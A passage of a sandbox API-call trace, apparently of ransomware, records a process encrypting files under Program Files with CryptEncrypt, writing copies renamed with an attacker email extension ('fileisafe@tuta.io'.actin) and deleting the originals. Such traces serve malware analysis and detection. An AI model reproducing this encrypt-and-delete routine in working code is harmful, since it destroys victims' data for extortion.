files\\microsoft shared\\clicktorun\\officec2rclient.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0145.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0145.743] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0145.743] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0145.743] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x3675058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0145.755] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x1e5acd, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0145.755] ReadFile (in: hFile=0x2ec, lpBuffer=0x36b5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36b5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0145.766] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x571068, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0145.766] ReadFile (in: hFile=0x2ec, lpBuffer=0x36f5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36f5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0145.957] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af96c | out: phKey=0x32af96c*=0xac2ff0) returned 1 [0145.957] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.958] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0060) returned 1 [0145.959] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0145.959] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af948 | out: lpNewFilePointer=0x0) returned 1 [0145.959] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x32af958, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af958*=0xc0112, lpOverlapped=0x0) returned 1 [0146.051] SetEndOfFile (hFile=0x2ec) returned 1 [0146.051] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x571068, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0146.051] WriteFile (in: hFile=0x2ec, lpBuffer=0x373514a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373514a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0146.054] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x1e5acd, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0146.054] WriteFile (in: hFile=0x2ec, lpBuffer=0x373514a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373514a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0146.057] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0146.057] WriteFile (in: hFile=0x2ec, lpBuffer=0x373514a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373514a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0146.058] CloseHandle (hObject=0x2ec) returned 1 [0146.059] SetEvent (hEvent=0x288) returned 1 [0146.059] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0146.059] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=996568) returned 1 [0146.059] CloseHandle (hObject=0x2ec) returned 1 [0146.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll")) returned 0x20 [0146.060] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0146.060] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0146.060] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0146.060] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0146.060] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2e70) returned 1 [0146.060] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0146.060] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xf34d8, lpOverlapped=0x0) returned 1 [0146.319] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xf34e0, dwBufLen=0xf34e0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xf34e0) returned 1 [0146.321] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf34e0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf34e0, lpOverlapped=0x0) returned 1 [0146.338] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32b0) returned 1 [0146.338] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0146.338] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0146.338] CryptDestroyKey (hKey=0xac32b0) returned 1 [0146.338] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0146.338] CryptDestroyKey (hKey=0xac2e70) returned 1 [0146.338] CloseHandle (hObject=0x2ec) returned 1 [0146.338] CloseHandle (hObject=0x2f8) returned 1 [0146.338] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll")) returned 1 [0146.346] SetEvent (hEvent=0x288) returned 1 [0146.550] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.550] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.718] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=390320) returned 1 [0146.719] CloseHandle (hObject=0x2f4) returned 1 [0146.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll")) returned 0x20 [0146.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.719] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0146.719] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0146.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.719] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac33f0) returned 1 [0146.720] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0146.720] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x5f4b0, lpOverlapped=0x0) returned 1 [0146.730] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x5f4c0, dwBufLen=0x5f4c0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x5f4c0) returned 1 [0146.731] WriteFile (in: hFile=0x304, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x5f4c0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x5f4c0, lpOverlapped=0x0) returned 1 [0146.744] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac30f0) returned 1 [0146.744] CryptSetKeyParam (hKey=0xac30f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0146.744] CryptEncrypt (in: hKey=0xac30f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0146.744] CryptDestroyKey (hKey=0xac30f0) returned 1 [0146.744] WriteFile (in: hFile=0x304, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0146.744] CryptDestroyKey (hKey=0xac33f0) returned 1 [0146.744] CloseHandle (hObject=0x2f4) returned 1 [0146.744] CloseHandle (hObject=0x304) returned 1 [0146.744] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vccorlib140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vccorlib140.dll")) returned 1 [0146.748] SetEvent (hEvent=0x288) returned 1 [0146.748] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.749] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=804864) returned 1 [0146.749] CloseHandle (hObject=0x304) returned 1 [0146.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe")) returned 0x20 [0146.749] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.750] SetEvent (hEvent=0x288) returned 1 [0146.750] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.750] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0146.750] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=11264) returned 1 [0146.751] CloseHandle (hObject=0x304) returned 1 [0146.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui")) returned 0x20 [0146.751] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.751] SetEvent (hEvent=0x288) returned 1 [0146.751] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.751] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.937] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=11264) returned 1 [0146.938] CloseHandle (hObject=0x2e8) returned 1 [0146.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui")) returned 0x20 [0146.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.938] SetEvent (hEvent=0x288) returned 1 [0146.938] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.938] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.938] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=498624) returned 1 [0146.938] CloseHandle (hObject=0x2e8) returned 1 [0146.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat")) returned 0x20 [0146.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.939] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.939] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1100592) returned 1 [0146.939] CloseHandle (hObject=0x2e8) returned 1 [0146.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat")) returned 0x20 [0146.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.939] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.940] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.940] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=2515696) returned 1 [0146.940] CloseHandle (hObject=0x2e8) returned 1 [0146.949] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat")) returned 0x20 [0146.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0146.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat")) returned 0 [0146.949] SetEvent (hEvent=0x288) returned 1 [0146.949] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.949] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.949] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3380096) returned 1 [0146.950] CloseHandle (hObject=0x2e8) returned 1 [0146.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat")) returned 0x20 [0146.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0 [0146.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat")) returned 0 [0146.950] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0146.951] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=361472) returned 1 [0146.951] CloseHandle (hObject=0x2e8) returned 1 [0146.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll")) returned 0x20 [0146.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft 